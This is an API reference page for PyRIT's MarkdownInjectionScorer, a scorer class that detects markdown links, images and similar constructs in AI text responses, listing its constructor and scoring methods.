pyrit.score.MarkdownInjectionScorer

pyrit.score.MarkdownInjectionScorer#

class MarkdownInjectionScorer(*, validator: ~pyrit.score.scorer_prompt_validator.ScorerPromptValidator | None = None, score_aggregator: ~typing.Callable[[~typing.Iterable[~pyrit.models.score.Score]], ~pyrit.score.score_aggregator_result.ScoreAggregatorResult] = <function _create_aggregator.<locals>.aggregator>)[source]#

Bases: TrueFalseScorer

A scorer that detects markdown injection attempts in text responses.

This scorer checks for the presence of markdown syntax patterns that could be used for injection attacks, such as links, images, or other markdown constructs that might be exploited. Returns True if markdown injection is detected.

__init__(*, validator: ~pyrit.score.scorer_prompt_validator.ScorerPromptValidator | None = None, score_aggregator: ~typing.Callable[[~typing.Iterable[~pyrit.models.score.Score]], ~pyrit.score.score_aggregator_result.ScoreAggregatorResult] = <function _create_aggregator.<locals>.aggregator>) None[source]#

Methods

__init__(*[, validator, score_aggregator])

get_identifier()

Returns an identifier dictionary for the scorer.

get_scorer_metrics(dataset_name[, metrics_type])

Returns evaluation statistics for the scorer using the dataset_name of the human labeled dataset that this scorer was run against.

scale_value_float(value, min_value, max_value)

Scales a value from 0 to 1 based on the given min and max values.

score_async(request_response, *[, ...])

Score the request_response, add the results to the database and return a list of Score objects.

score_image_async(image_path, *[, objective])

Scores the given image using the chat target.

score_image_batch_async(*, image_paths[, ...])

score_prompts_batch_async(*, request_responses)

Score multiple prompts in batches using the provided objectives.

score_response_async(*, response[, ...])

Score a response using an objective scorer and optional auxiliary scorers.

score_response_multiple_scorers_async(*, ...)

Score a response using multiple scorers in parallel.

score_text_async(text, *[, objective])

Scores the given text based on the task using the chat target.

validate_return_scores(scores)

Validates the scores returned by the scorer.

Attributes

scorer_type